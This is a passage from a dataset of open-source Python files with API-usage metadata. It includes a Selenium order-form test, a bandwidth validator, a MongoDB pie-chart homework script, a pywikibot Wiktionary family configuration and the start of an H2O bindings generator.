"usage_type": "attribute"}, {"api_name": "os.walk", "line_number": 26, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 28, "usage_type": "call"}, {"api_name": "os.path", "line_number": 28, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 31, "usage_type": "call"}, {"api_name": "os.path", "line_number": 31, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 33, "usage_type": "call"}, {"api_name": "os.path", "line_number": 33, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 35, "usage_type": "call"}, {"api_name": "os.path", "line_number": 35, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 36, "usage_type": "call"}, {"api_name": "shutil.move", "line_number": 37, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 37, "usage_type": "call"}, {"api_name": "os.path", "line_number": 37, "usage_type": "attribute"}, {"api_name": "os.walk", "line_number": 42, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 44, "usage_type": "call"}, {"api_name": "os.path", "line_number": 44, "usage_type": "attribute"}, {"api_name": "os.path.splitext", "line_number": 46, "usage_type": "call"}, {"api_name": "os.path", "line_number": 46, "usage_type": "attribute"}, {"api_name": "subprocess.run", "line_number": 47, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 48, "usage_type": "call"}, {"api_name": "os.walk", "line_number": 62, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 64, "usage_type": "call"}, {"api_name": "os.path", "line_number": 64, "usage_type": "attribute"}, {"api_name": "shutil.move", "line_number": 65, "usage_type": "call"}, {"api_name": "os.walk", "line_number": 66, "usage_type": "call"}, {"api_name": "shutil.rmtree", "line_number": 69, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 69, "usage_type": "call"}, {"api_name": "os.path", "line_number": 69, "usage_type": "attribute"}, {"api_name": "argparse.ArgumentParser", "line_number": 73, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 84, "usage_type": "call"}, {"api_name": "os.path", "line_number": 84, "usage_type": "attribute"}]} +{"seq_id": "444303573", "text": "import allure\nimport pytest\nfrom pages.order_page import OrderPage\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.support.ui import WebDriverWait\n\n\n@allure.description('Тест для браузера Chrome')\ndef test_order_input(browser):\n order_page = OrderPage(browser)\n order_page.open()\n order_page.enter_name()\n order_page.enter_surname()\n order_page.enter_address()\n order_page.select_random_station()\n order_page.enter_phone_number()\n order_page.click_next_page_button()\n order_page.select_date()\n order_page.select_rental_period()\n order_page.select_colour_black()\n order_page.enter_comment()\n order_page.click_order_button()\n order_page.click_confirm_order_button()\n element = order_page.find_element((By.CSS_SELECTOR, \"div.Order_ModalHeader__3FDaJ\"))\n try:\n assert \"Заказ оформлен\" in element.text\n assert \"Номер заказа:\" in element.text\n assert \"Запишите его\" in element.text\n except AssertionError:\n pytest.skip(\"Разработчики еще не допилили до конца версию для Chrome\")\n", "repo_name": "OlegW307/QASprint_4", "sub_path": "tests/test_workflow_order_success.py", "file_name": "test_workflow_order_success.py", "file_ext": "py", "file_size_in_byte": 1227, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "pages.order_page.OrderPage", "line_number": 11, "usage_type": "call"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 25, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 25, "usage_type": "name"}, {"api_name": "pytest.skip", "line_number": 31, "usage_type": "call"}, {"api_name": "allure.description", "line_number": 9, "usage_type": "call"}]} +{"seq_id": "14326317443", "text": "import logging\nimport time\nfrom threading import RLock\nfrom typing import List, Set, Type\n\nfrom pymmortals import immortalsglobals as ig\nfrom pymmortals import triples_helper\nfrom pymmortals.datatypes.interfaces import AbstractMonitor\nfrom pymmortals.datatypes.root_configuration import get_configuration\nfrom pymmortals.datatypes.routing import EventType, EventTags, EventTag\nfrom pymmortals.datatypes.scenariorunnerconfiguration import ScenarioRunnerConfiguration\nfrom pymmortals.generated.com.securboration.immortals.ontology.cp.gmeinterchangeformat import GmeInterchangeFormat\nfrom pymmortals.generated.mil.darpa.immortals.core.api.ll.phase1.analyticsevent import AnalyticsEvent\nfrom pymmortals.generated.mil.darpa.immortals.core.api.ll.phase1.status import Status\nfrom pymmortals.generated.mil.darpa.immortals.core.api.ll.phase1.testresult import TestResult\nfrom pymmortals.generated.mil.darpa.immortals.core.api.validation.validators import Validators\nfrom pymmortals.monitors.server_network_traffic_monitor import ServerNetworkTrafficMonitor\nfrom pymmortals.validators.abstract_local_validator import AbstractLocalValidator\n\n_event_ticker_lock = RLock()\n_event_ticker = 0\n\n\ndef _create_bandwidth_calculated_event(bytes_used, event_time_ms=None):\n global _event_ticker, _event_ticker_lock\n\n with _event_ticker_lock:\n if event_time_ms is None:\n event_time_ms = time.time() * 1000\n\n event = AnalyticsEvent(\n type='combinedServerTrafficBytesPerSecond',\n eventSource='bandwidth-maximum-validator',\n eventTime=event_time_ms,\n eventRemoteSource='global',\n dataType='java.lang.Long',\n eventId=_event_ticker,\n data=str(bytes_used)\n )\n _event_ticker += 1\n return event\n\n\nclass BandwidthValidator(AbstractLocalValidator):\n @classmethod\n def identifier(cls) -> str:\n return Validators.BANDWIDTH_MAXIMUM_VALIDATOR.identifier\n\n @classmethod\n def get_monitor_classes(cls) -> Set[Type[AbstractMonitor]]:\n return {ServerNetworkTrafficMonitor}\n\n def run_time_ms(self) -> int:\n return self._run_time_ms\n\n def __init__(self, gif: GmeInterchangeFormat, runner_configuration: ScenarioRunnerConfiguration):\n super().__init__(gif=gif, runner_configuration=runner_configuration)\n self._offline_clients: List[str] = [a.instanceIdentifier\n for a in runner_configuration.scenario.deploymentApplications\n if a.applicationIdentifier.lower() == 'ataklite']\n self._timestamp_list: List[int] = []\n self._byte_list: List[int] = []\n\n self._max_hit_bandwidth_kilobits_per_second: int = -1\n\n validation_reporting_interval_secs = \\\n get_configuration().validation.bandwidthMonitorReportingIntervalMS / 1000\n\n self._sample_span_seconds: int = 0\n\n client_count = triples_helper.get_android_client_count(gif)\n image_broadcast_interval_ms = triples_helper.get_image_rate_ms(gif)\n pli_broadcast_interval_ms = triples_helper.get_pli_rate_ms(gif)\n\n for q in range(client_count):\n self._sample_span_seconds = \\\n max(self._sample_span_seconds, image_broadcast_interval_ms, pli_broadcast_interval_ms)\n\n self._sample_span_seconds /= 1000\n sample_delay_seconds = max(len(self._offline_clients) * 2, self._sample_span_seconds // 2)\n\n self._sample_span_seconds *= get_configuration().validation.bandwidthValidatorSampleDurationMultiplier\n\n # Wait for half the sample span for things to settle before starting to measure data\n self._lower_idx: int = sample_delay_seconds\n self._upper_idx: int = int((self._lower_idx + (self._sample_span_seconds / validation_reporting_interval_secs)))\n\n logging.debug('Bandwidth Sampling Starting Lower Idx: ' + str(self._lower_idx))\n logging.info('Bandwidth Sampling Starting Upper Idx: ' + str(self._upper_idx))\n\n self._maximum_bandwidth_kbits_per_second: int = triples_helper.get_bandwidth_constraint_kbit_per_second(gif)\n\n self._image_send_count = 0\n self._image_receive_count = 0\n self._run_time_ms = max(60, 3 * self._sample_span_seconds)\n\n def _receive_event(self, event_tag: EventTag, data: AnalyticsEvent):\n if isinstance(data, list):\n data_list = data\n else:\n data_list = [data]\n\n for event in data_list:\n if self._current_result.currentState == Status.RUNNING:\n\n if event_tag == EventTags.AnalyticsEventServerNetworkTrafficMeasuredBytes:\n\n bandwidth_calculated_event = None\n\n if len(self._offline_clients) == 0:\n self._timestamp_list.append(event.eventTime)\n self._byte_list.append(int(event.data))\n logging.debug(\"Bandwidth Timestamp: \" + str(event.eventTime))\n logging.debug(\"Bandwidth Total Bytes: \" + str(event.data))\n\n if self._upper_idx < len(self._timestamp_list):\n time_delta = self._timestamp_list[self._upper_idx] - self._timestamp_list[\n self._lower_idx]\n bytes_delta = self._byte_list[self._upper_idx] - self._byte_list[self._lower_idx]\n\n logging.debug(\"Bandwith Window Bytes Delta: \" + str(bytes_delta))\n logging.debug('Bandwidth Window Time Delta: ' + str(time_delta))\n\n bandwidth_kilobits_per_second = int((bytes_delta * 8 / 1000) / (time_delta / 1000))\n logging.debug('Bandwidth Kilobits Per Second: ' + str(bandwidth_kilobits_per_second))\n self._max_hit_bandwidth_kilobits_per_second = \\\n max(self._max_hit_bandwidth_kilobits_per_second,\n bandwidth_kilobits_per_second)\n\n if bandwidth_kilobits_per_second >= self._maximum_bandwidth_kbits_per_second:\n self._current_result.errorMessages.append(\n str(bandwidth_kilobits_per_second)\n + ' is greater than the maximum bandwidth of '\n + str(self._maximum_bandwidth_kbits_per_second) + '!')\n\n self._lower_idx += 1\n self._upper_idx += 1\n\n bandwidth_calculated_event = _create_bandwidth_calculated_event(\n (bandwidth_kilobits_per_second / 8 * 1000),\n event_time_ms=event.eventTime)\n\n if bandwidth_calculated_event is not None:\n ig.get_event_router().submit_asynchronously(\n EventTags.AnalyticsEventServerNetworkTrafficCalculatedBytesPerSec,\n bandwidth_calculated_event)\n\n elif event_tag.event_type == EventType.ANALYSIS and event.eventSource in self._offline_clients:\n self._offline_clients.remove(event.eventSource)\n\n def _attempt_validation(self, terminal_state: bool) -> TestResult:\n if terminal_state:\n if len(self._offline_clients) > 0:\n self._current_result.errorMessages.append(\"Not all clients have come online!\")\n\n if self._max_hit_bandwidth_kilobits_per_second <= 0:\n self._current_result.errorMessages.append(\n \"Not enough time has passed to collect an accurate bandwidth measurement!\")\n\n if len(self._current_result.errorMessages) > 0:\n self._current_result.currentState = Status.FAILURE\n\n else:\n self._current_result.detailMessages.append(\n 'The maximum bandwith over a ' + str(self._sample_span_seconds) +\n ' second window is '\n + str(self._max_hit_bandwidth_kilobits_per_second)\n + 'kilobits per second, which is below the threshold of '\n + str(self._maximum_bandwidth_kbits_per_second) + '.')\n self._current_result.currentState = Status.SUCCESS\n\n return self._current_result\n", "repo_name": "darpa-brass/bbn-immortals", "sub_path": "phase02/immortals_repo/harness/pymmortals/validators/bandwidth_validator.py", "file_name": "bandwidth_validator.py", "file_ext": "py", "file_size_in_byte": 8400, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "threading.RLock", "line_number": 20, "usage_type": "call"}, {"api_name": "time.time", "line_number": 29, "usage_type": "call"}, {"api_name": "pymmortals.generated.mil.darpa.immortals.core.api.ll.phase1.analyticsevent.AnalyticsEvent", "line_number": 31, "usage_type": "call"}, {"api_name": "pymmortals.validators.abstract_local_validator.AbstractLocalValidator", "line_number": 44, "usage_type": "name"}, {"api_name": "pymmortals.generated.mil.darpa.immortals.core.api.validation.validators.Validators.BANDWIDTH_MAXIMUM_VALIDATOR", "line_number": 47, "usage_type": "attribute"}, {"api_name": "pymmortals.generated.mil.darpa.immortals.core.api.validation.validators.Validators", "line_number": 47, "usage_type": "name"}, {"api_name": "pymmortals.monitors.server_network_traffic_monitor.ServerNetworkTrafficMonitor", "line_number": 51, "usage_type": "name"}, {"api_name": "typing.Set", "line_number": 50, "usage_type": "name"}, {"api_name": "typing.Type", "line_number": 50, "usage_type": "name"}, {"api_name": "pymmortals.datatypes.interfaces.AbstractMonitor", "line_number": 50, "usage_type": "name"}, {"api_name": "pymmortals.generated.com.securboration.immortals.ontology.cp.gmeinterchangeformat.GmeInterchangeFormat", "line_number": 56, "usage_type": "name"}, {"api_name": "pymmortals.datatypes.scenariorunnerconfiguration.ScenarioRunnerConfiguration", "line_number": 56, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 58, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 61, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 62, "usage_type": "name"}, {"api_name": "pymmortals.datatypes.root_configuration.get_configuration", "line_number": 67, "usage_type": "call"}, {"api_name": "pymmortals.triples_helper.get_android_client_count", "line_number": 71, "usage_type": "call"}, {"api_name": "pymmortals.triples_helper", "line_number": 71, "usage_type": "name"}, {"api_name": "pymmortals.triples_helper.get_image_rate_ms", "line_number": 72, "usage_type": "call"}, {"api_name": "pymmortals.triples_helper", "line_number": 72, "usage_type": "name"}, {"api_name": "pymmortals.triples_helper.get_pli_rate_ms", "line_number": 73, "usage_type": "call"}, {"api_name": "pymmortals.triples_helper", "line_number": 73, "usage_type": "name"}, {"api_name": "pymmortals.datatypes.root_configuration.get_configuration", "line_number": 82, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 88, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 89, "usage_type": "call"}, {"api_name": "pymmortals.triples_helper.get_bandwidth_constraint_kbit_per_second", "line_number": 91, "usage_type": "call"}, {"api_name": "pymmortals.triples_helper", "line_number": 91, "usage_type": "name"}, {"api_name": "pymmortals.datatypes.routing.EventTag", "line_number": 97, "usage_type": "name"}, {"api_name": "pymmortals.generated.mil.darpa.immortals.core.api.ll.phase1.analyticsevent.AnalyticsEvent", "line_number": 97, "usage_type": "name"}, {"api_name": "pymmortals.generated.mil.darpa.immortals.core.api.ll.phase1.status.Status.RUNNING", "line_number": 104, "usage_type": "attribute"}, {"api_name": "pymmortals.generated.mil.darpa.immortals.core.api.ll.phase1.status.Status", "line_number": 104, "usage_type": "name"}, {"api_name": "pymmortals.datatypes.routing.EventTags.AnalyticsEventServerNetworkTrafficMeasuredBytes", "line_number": 106, "usage_type": "attribute"}, {"api_name": "pymmortals.datatypes.routing.EventTags", "line_number": 106, "usage_type": "name"}, {"api_name": "logging.debug", "line_number": 113, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 114, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 121, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 122, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 125, "usage_type": "call"}, {"api_name": "pymmortals.immortalsglobals.get_event_router", "line_number": 144, "usage_type": "call"}, {"api_name": "pymmortals.immortalsglobals", "line_number": 144, "usage_type": "name"}, {"api_name": "pymmortals.datatypes.routing.EventTags.AnalyticsEventServerNetworkTrafficCalculatedBytesPerSec", "line_number": 145, "usage_type": "attribute"}, {"api_name": "pymmortals.datatypes.routing.EventTags", "line_number": 145, "usage_type": "name"}, {"api_name": "pymmortals.datatypes.routing.EventType.ANALYSIS", "line_number": 148, "usage_type": "attribute"}, {"api_name": "pymmortals.datatypes.routing.EventType", "line_number": 148, "usage_type": "name"}, {"api_name": "pymmortals.generated.mil.darpa.immortals.core.api.ll.phase1.status.Status.FAILURE", "line_number": 161, "usage_type": "attribute"}, {"api_name": "pymmortals.generated.mil.darpa.immortals.core.api.ll.phase1.status.Status", "line_number": 161, "usage_type": "name"}, {"api_name": "pymmortals.generated.mil.darpa.immortals.core.api.ll.phase1.status.Status.SUCCESS", "line_number": 170, "usage_type": "attribute"}, {"api_name": "pymmortals.generated.mil.darpa.immortals.core.api.ll.phase1.status.Status", "line_number": 170, "usage_type": "name"}, {"api_name": "pymmortals.generated.mil.darpa.immortals.core.api.ll.phase1.testresult.TestResult", "line_number": 151, "usage_type": "name"}]} +{"seq_id": "27106865213", "text": "from matplotlib import pyplot\nfrom pymongo import MongoClient\nuri = \"mongodb://admin:admin@ds021182.mlab.com:21182/c4e\"\nclient = MongoClient(uri)\ndb = client.get_database()\ncustomers_collection = db[\"customers\"]\ncount_events = 0\ncount_ads = 0\ncount_wom = 0\nfor i in customers_collection.find():\n if i[\"ref\"].count(\"events\") == 1:\n count_events += 1\n elif i[\"ref\"].count(\"ads\") == 1:\n count_ads += 1\n elif i[\"ref\"].count(\"wom\") == 1:\n count_wom += 1\n\ncustomers_ref_counts = [count_events, count_ads, count_wom]\ncustomers_ref_names = [\"events\", \"ads\", \"wom\"]\nprint(customers_ref_names, customers_ref_counts)\n\npyplot.pie(customers_ref_counts, labels=customers_ref_names, autopct=\"%.0f%%\", shadow=True, explode=[0, 0.1, 0])\npyplot.title(\"References\")\npyplot.axis(\"equal\")\n\npyplot.show()\n\nclient.close()", "repo_name": "nmhoangg2000/lab-c4e24", "sub_path": "lab1/homework/se4.py", "file_name": "se4.py", "file_ext": "py", "file_size_in_byte": 828, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "pymongo.MongoClient", "line_number": 4, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.pie", "line_number": 22, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 22, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 23, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 23, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axis", "line_number": 24, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 24, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 26, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 26, "usage_type": "name"}]} +{"seq_id": "71562023874", "text": "# -*- coding: utf-8 -*-\n\"\"\"Family module for Wiktionary.\"\"\"\n#\n# (C) Pywikibot team, 2005-2018\n#\n# Distributed under the terms of the MIT license.\n#\nfrom __future__ import absolute_import, unicode_literals\n\nfrom pywikibot import family\n\n\n# The Wikimedia family that is known as Wiktionary\nclass Family(family.SubdomainFamily, family.WikimediaFamily):\n\n \"\"\"Family class for Wiktionary.\"\"\"\n\n name = 'wiktionary'\n\n closed_wikis = [\n # See https://noc.wikimedia.org/conf/highlight.php?file=closed.dblist\n 'aa', 'ab', 'ak', 'als', 'as', 'av', 'ba', 'bh', 'bi', 'bm', 'bo',\n 'ch', 'cr', 'dz', 'ik', 'mh', 'mo', 'pi', 'rm', 'rn', 'sc', 'sn',\n 'to', 'tw', 'xh', 'yo', 'za',\n ]\n\n removed_wikis = [\n # See https://noc.wikimedia.org/conf/highlight.php?file=deleted.dblist\n 'dk', 'ba', 'tlh', 'tokipona',\n ]\n\n def __init__(self):\n \"\"\"Initializer.\"\"\"\n self.languages_by_size = [\n 'en', 'mg', 'fr', 'sh', 'ru', 'es', 'zh', 'de', 'nl', 'lt', 'sv',\n 'ku', 'pl', 'el', 'it', 'ta', 'hu', 'fi', 'tr', 'ca', 'ko', 'io',\n 'kn', 'pt', 'hy', 'vi', 'sr', 'ja', 'chr', 'hi', 'th', 'ro', 'no',\n 'ml', 'id', 'et', 'uz', 'li', 'my', 'or', 'te', 'fa', 'cs', 'eo',\n 'ar', 'jv', 'az', 'eu', 'gl', 'oc', 'da', 'lo', 'br', 'uk', 'hr',\n 'fj', 'tg', 'bg', 'simple', 'ps', 'cy', 'sk', 'vo', 'wa', 'is',\n 'zh-min-nan', 'la', 'scn', 'af', 'he', 'ast', 'tl', 'ky', 'sw',\n 'fy', 'nn', 'lv', 'co', 'pnb', 'mn', 'pa', 'ka', 'nds', 'sl', 'sq',\n 'lb', 'bs', 'nah', 'sa', 'kk', 'bn', 'tk', 'km', 'sm', 'mk', 'hsb',\n 'be', 'ms', 'ga', 'ur', 'an', 'wo', 'vec', 'ang', 'tt', 'sd', 'gn',\n 'mr', 'so', 'csb', 'ug', 'gd', 'mt', 'st', 'roa-rup', 'si', 'hif',\n 'ia', 'ie', 'mi', 'ay', 'kl', 'fo', 'jbo', 'ln', 'zu', 'na', 'gu',\n 'gv', 'kw', 'rw', 'ts', 'ne', 'om', 'qu', 'su', 'ss', 'ha', 'iu',\n 'am', 'dv', 'tpi', 'yi', 'ti', 'sg', 'tn', 'ks',\n ]\n\n super(Family, self).__init__()\n\n self.category_redirect_templates = {\n '_default': (),\n 'zh': ('分类重定向',),\n }\n\n # Global bot allowed languages on\n # https://meta.wikimedia.org/wiki/BPI#Current_implementation\n # & https://meta.wikimedia.org/wiki/Special:WikiSets/2\n self.cross_allowed = [\n 'am', 'af', 'am', 'ang', 'an', 'ar', 'ast', 'ay', 'az', 'be',\n 'bg', 'bn', 'br', 'bs', 'ca', 'chr', 'co', 'csb', 'cs', 'cy',\n 'da', 'dv', 'el', 'eo', 'es', 'et', 'eu', 'fa', 'fi', 'fj', 'fo',\n 'fy', 'ga', 'gd', 'gl', 'gn', 'gu', 'gv', 'ha', 'hsb', 'hu', 'hy',\n 'ia', 'id', 'ie', 'io', 'iu', 'jbo', 'jv', 'ka', 'kk', 'kl', 'km',\n 'kn', 'ko', 'ks', 'ku', 'kw', 'ky', 'la', 'lb', 'ln', 'lo', 'lt',\n 'lv', 'mg', 'mi', 'mk', 'ml', 'mn', 'ms', 'mt', 'my', 'nah', 'na',\n 'nds', 'ne', 'nl', 'nn', 'no', 'oc', 'om', 'or', 'pa', 'pnb',\n 'ps', 'pt', 'qu', 'roa_rup', 'rw', 'sa', 'scn', 'sd', 'sg', 'sh',\n 'simple', 'si', 'sk', 'sl', 'sm', 'so', 'sq', 'sr', 'ss', 'st',\n 'su', 'sv', 'sw', 'ta', 'te', 'tg', 'th', 'ti', 'tk', 'tl', 'tn',\n 'tpi', 'tr', 'ts', 'tt', 'ug', 'uk', 'ur', 'uz', 'vec', 'vi', 'vo',\n 'wa', 'wo', 'yi', 'zh_min_nan', 'zh', 'zu',\n ]\n\n # Other than most Wikipedias, page names must not start with a capital\n # letter on ALL Wiktionaries.\n self.nocapitalize = list(self.langs.keys())\n\n # Which languages have a special order for putting interlanguage links,\n # and what order is it? If a language is not in interwiki_putfirst,\n # alphabetical order on language code is used. For languages that are in\n # interwiki_putfirst, interwiki_putfirst is checked first, and\n # languages are put in the order given there. All other languages are\n # put after those, in code-alphabetical order.\n\n self.alphabetic_sv = [\n 'aa', 'af', 'ak', 'als', 'an', 'roa-rup', 'ast', 'gn', 'ay', 'az',\n 'id', 'ms', 'bm', 'zh-min-nan', 'jv', 'su', 'mt', 'bi', 'bo', 'bs',\n 'br', 'ca', 'cs', 'ch', 'sn', 'co', 'za', 'cy', 'da', 'de', 'na',\n 'mh', 'et', 'ang', 'en', 'es', 'eo', 'eu', 'to', 'fr', 'fy', 'fo',\n 'ga', 'gv', 'sm', 'gd', 'gl', 'hr', 'io', 'ia', 'ie', 'ik', 'xh',\n 'is', 'zu', 'it', 'kl', 'csb', 'kw', 'rw', 'rn', 'sw', 'ky', 'ku',\n 'la', 'lv', 'lb', 'lt', 'li', 'ln', 'jbo', 'hu', 'mg', 'mi', 'mo',\n 'my', 'fj', 'nah', 'nl', 'cr', 'no', 'nn', 'hsb', 'oc', 'om', 'ug',\n 'uz', 'nds', 'pl', 'pt', 'ro', 'rm', 'qu', 'sg', 'sc', 'st', 'tn',\n 'sq', 'scn', 'simple', 'ss', 'sk', 'sl', 'so', 'sh', 'fi', 'sv',\n 'tl', 'tt', 'vi', 'tpi', 'tr', 'tw', 'vo', 'wa', 'wo', 'ts', 'yo',\n 'el', 'av', 'ab', 'ba', 'be', 'bg', 'mk', 'mn', 'ru', 'sr', 'tg',\n 'uk', 'kk', 'hy', 'yi', 'he', 'ur', 'ar', 'tk', 'sd', 'fa', 'ha',\n 'ps', 'dv', 'ks', 'ne', 'pi', 'bh', 'mr', 'sa', 'hi', 'as', 'bn',\n 'pa', 'pnb', 'gu', 'or', 'ta', 'te', 'kn', 'ml', 'si', 'th', 'lo',\n 'dz', 'ka', 'ti', 'am', 'chr', 'iu', 'km', 'zh', 'ja', 'ko',\n ]\n\n self.interwiki_putfirst = {\n 'da': self.alphabetic,\n 'en': self.alphabetic,\n 'et': self.alphabetic,\n 'fi': self.alphabetic,\n 'fy': self.fyinterwiki,\n 'he': ['en'],\n 'hu': ['en'],\n 'ms': self.alphabetic_revised,\n 'pl': self.alphabetic_revised,\n 'sv': self.alphabetic_sv,\n 'simple': self.alphabetic,\n }\n\n self.interwiki_on_one_line = ['pl']\n\n self.interwiki_attop = ['pl']\n\n # Subpages for documentation.\n # TODO: List is incomplete, to be completed for missing languages.\n self.doc_subpages = {\n '_default': ((u'/doc', ),\n ['en']\n ),\n }\n", "repo_name": "joomla-projects/gsoc17_helpscreens_pywiki", "sub_path": "pywikibot/families/wiktionary_family.py", "file_name": "wiktionary_family.py", "file_ext": "py", "file_size_in_byte": 6076, "program_lang": "python", "lang": "tg", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "61", "api": [{"api_name": "pywikibot.family.SubdomainFamily", "line_number": 14, "usage_type": "attribute"}, {"api_name": "pywikibot.family", "line_number": 14, "usage_type": "name"}, {"api_name": "pywikibot.family.WikimediaFamily", "line_number": 14, "usage_type": "attribute"}]} +{"seq_id": "13336343714", "text": "#!/usr/bin/env python\n# -*- encoding: utf-8 -*-\nfrom copy import deepcopy\nfrom functools import partial\nfrom io import StringIO\nfrom inspect import getsource\nfrom pprint import pformat\nimport sys\n\nimport bindings as bi\nfrom custom import get_customizations_for, reformat_block\n\nstr_type = str\nget_customizations_for = partial(get_customizations_for, 'python')\n\n\ndef get_customizations_or_defaults_for(algo, prop, default=None):\n return get_customizations_for(algo, prop, get_customizations_for('defaults', prop, default))\n\n\ndef code_as_str(code):\n if code is None:\n return None\n if isinstance(code, str):\n return code\n if callable(code):\n return '\\n'.join(getsource(code).splitlines()[1:])\n raise AssertionError(\"`code` param should be a string or a function definition\")\n\n\n# We specify these not as real types, but as parameter annotations in the docstrings\nclass PythonTypeTranslatorForCheck(bi.TypeTranslator):\n def __init__(self):\n super(PythonTypeTranslatorForCheck, self).__init__()\n self.types[\"byte\"] = \"int\"\n self.types[\"short\"] = \"int\"\n self.types[\"long\"] = \"int\"\n self.types[\"double\"] = \"numeric\"\n self.types[\"string\"] = \"str\"\n self.types[\"boolean\"] = \"bool\"\n self.types[\"Polymorphic\"] = \"object\"\n self.types[\"Object\"] = \"object\"\n self.types[\"VecSpecifier\"] = \"str\"\n self.types[\"BlendingParams\"] = \"dict\"\n self.types[\"StringPair\"] = \"tuple\"\n self.types[\"KeyValue\"] = \"dict\"\n self.make_array = lambda vtype: \"dict\" if vtype == \"dict\" else \"[%s]\" % vtype\n self.make_array2 = lambda vtype: \"[[%s]]\" % vtype\n self.make_map = lambda ktype, vtype: \"{%s: %s}\" % (ktype, vtype)\n self.make_key = lambda itype, schema: (\"str, H2OFrame\" if schema == \"Key\"\n else \"str, H2OEstimator\" if schema == \"Key\"\n else \"str\")\n self.make_enum = lambda schema, values: (\"Enum(%s)\" % \", \".join(stringify(v) for v in values) if values\n else schema)\n\n\ntype_adapter1 = PythonTypeTranslatorForCheck()\n\n\ndef translate_type_for_check(h2o_type, values=None):\n schema = h2o_type.replace(\"[]\", \"\")\n return type_adapter1.translate(h2o_type, schema, values)\n\n\n# We specify these not as real types, but as parameter annotations in the docstrings\nclass PythonTypeTranslatorForDoc(bi.TypeTranslator):\n def __init__(self):\n super(PythonTypeTranslatorForDoc, self).__init__()\n self.types[\"byte\"] = \"int\"\n self.types[\"short\"] = \"int\"\n self.types[\"long\"] = \"int\"\n self.types[\"double\"] = \"float\"\n self.types[\"string\"] = \"str\"\n self.types[\"boolean\"] = \"bool\"\n self.types[\"Polymorphic\"] = \"object\"\n self.types[\"Object\"] = \"object\"\n self.types[\"VecSpecifier\"] = \"str\"\n self.types[\"BlendingParams\"] = \"dict\"\n self.types[\"StringPair\"] = \"tuple\"\n self.types[\"KeyValue\"] = \"dict\"\n self.make_array = lambda vtype: \"dict\" if vtype == \"dict\" else \"List[%s]\" % vtype\n self.make_array2 = lambda vtype: \"List[List[%s]]\" % vtype\n self.make_map = lambda ktype, vtype: \"Dict[%s, %s]\" % (ktype, vtype)\n self.make_key = lambda itype, schema: (\"Union[None, str, H2OFrame]\" if schema == \"Key\"\n else \"Union[None, str, H2OEstimator]\" if schema == \"Key\"\n else \"str\")\n self.make_enum = lambda schema, values: (\"Literal[%s]\" % \", \".join(stringify(v) for v in values) if values # see PEP-586\n else schema)\n\n\ntype_adapter2 = PythonTypeTranslatorForDoc()\n\n\ndef translate_type_for_doc(h2o_type, values=None):\n schema = h2o_type.replace(\"[]\", \"\")\n return type_adapter2.translate(h2o_type, schema, values)\n\n\ndef normalize_enum_constant(s):\n \"\"\"Return enum constant `s` converted to a canonical snake-case.\"\"\"\n if s.islower(): return s\n if s.isupper(): return s.lower()\n return \"\".join(ch if ch.islower() else \"_\" + ch.lower() for ch in s).strip(\"_\")\n\n\ndef stringify(v, infinity=u'∞'):\n if v is None:\n return None\n if v == \"Infinity\":\n return infinity\n if isinstance(v, str_type):\n return '\"{}\"'.format(v)\n if isinstance(v, int):\n if v > (1 << 62): # handle Long.MAX_VALUE case \n return infinity\n return str(v)\n if isinstance(v, float): \n if v > (1 << 128): # handle Double.MAX_VALUE case\n return infinity\n return \"{:.10}\".format(v)\n return str(v)\n\n\n# This is the list of all reserved keywords in Python. It is a syntax error to use any of them as an object's property.\n# Currently we have only \"lambda\" in GLM as a violator, but keeping the whole list here just to be future-proof.\n# For all such violating properties, we name the accessor with an underscore at the end (eg. lambda_), but at the same\n# time keep the actual name in self.params (i.e. model.lambda_ ≡ model.params[\"lambda\"]).\nreserved_words = {\n \"and\", \"del\", \"from\", \"not\", \"while\", \"as\", \"elif\", \"global\", \"or\", \"with\", \"assert\", \"else\", \"if\", \"pass\",\n \"yield\", \"break\", \"except\", \"import\", \"print\", \"class\", \"exec\", \"in\", \"raise\", \"continue\", \"finally\", \"is\",\n \"return\", \"def\", \"for\", \"lambda\", \"try\"\n}\n\n\n# ----------------------------------------------------------------------------------------------------------------------\n# Generate per-model classes\n# ----------------------------------------------------------------------------------------------------------------------\ndef gen_module(schema, algo):\n \"\"\"\n Ideally we should be able to avoid logic specific to algos in this file.\n Instead, customizations are externalized in ./python/gen_{algo}.py files.\n Logic that is specific to python types (e.g. H2OFrame, enums as list...) should however stay here\n as the type translation is done in this file.\n \"\"\"\n classname = algo_to_classname(algo)\n extra_imports = 